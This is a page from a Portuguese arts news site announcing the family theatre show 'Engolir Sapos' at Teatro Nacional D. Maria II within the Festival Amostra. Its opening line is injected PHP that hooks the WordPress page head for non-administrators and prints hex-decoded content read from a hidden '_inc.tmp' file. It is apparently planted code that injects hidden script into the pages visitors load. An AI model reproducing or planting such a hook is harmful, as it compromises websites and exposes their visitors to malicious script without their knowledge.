if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Engolir Sapos no D. Maria II - artesentreasletras.com.pt

Engolir Sapos no D. Maria II

Foto: José Alfredo

Engolir Sapos, espetáculo de teatro para famílias da companhia Amarelo Silvestre, chega ao Teatro Nacional D. Maria II na próxima semana, para apresentações destinadas a escolas e famílias. Integrado na programação do Festival Amostra (Mostra-plataforma nacional de artes performativas para a infância e juventude), Engolir Sapos será apresentado na Sala Estúdio a 12, 13 e 14 de Janeiro, em sessões para escolas, e a 15 de Janeiro, sábado, às 14h30, numa sessão para famílias.
Uma encenação de Rafaela Santos, com dramaturgia de Fernando Giestas, Engolir Sapos coloca em palco um adulto e uma criança (Ricardo Vaz Trindade e Amélia Giestas), que interpretam um pai e uma filha.
Destinado a maiores de 12 anos, o espetáculo propõe uma reflexão artística sobre preconceitos e sapos de loiça.O Festival Amostra é uma iniciativa que junta a companhia Caótica e cinco instituições culturais da cidade de Lisboa – Centro Cultural de Belém|Fábrica das Artes, Culturgest, São Luiz Teatro Municipal, Teatro LU.CA e Teatro Nacional D. Maria II. Com o objetivo de promover um encontro e debate em torno das artes performativas destinadas à infância e juventude, serão apresentados cinco espetáculos, oriundos de várias regiões do país, em cinco espaços diferentes.